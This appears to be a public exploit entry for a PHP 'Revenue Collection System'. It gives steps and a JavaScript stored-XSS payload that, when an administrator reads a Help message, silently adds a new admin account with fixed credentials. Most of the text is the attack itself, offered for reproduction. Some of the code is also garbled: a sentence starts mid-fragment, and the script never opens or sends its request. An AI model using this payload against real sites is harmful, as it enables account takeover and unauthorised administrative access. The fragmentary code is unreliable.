# Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS
# Exploit Author: Joe Pollock
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: T.B.C
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
# Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated
# client user to add an administrative user account to the application then log in as the newly created admin.
To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).
'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will
be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should
now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the
'target', 'x_Username', and 'x_Passsword' as required).
var target = "http://localhost/rates/admin/usersadd.php";
var req = new XMLHttpRequest();
var parser = new DOMParser();
resp = req.responseText
var document = parser.parseFromString(resp, "text/html");
var token = document.getElementsByName("token").value;
var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";
req.withCredentials = true;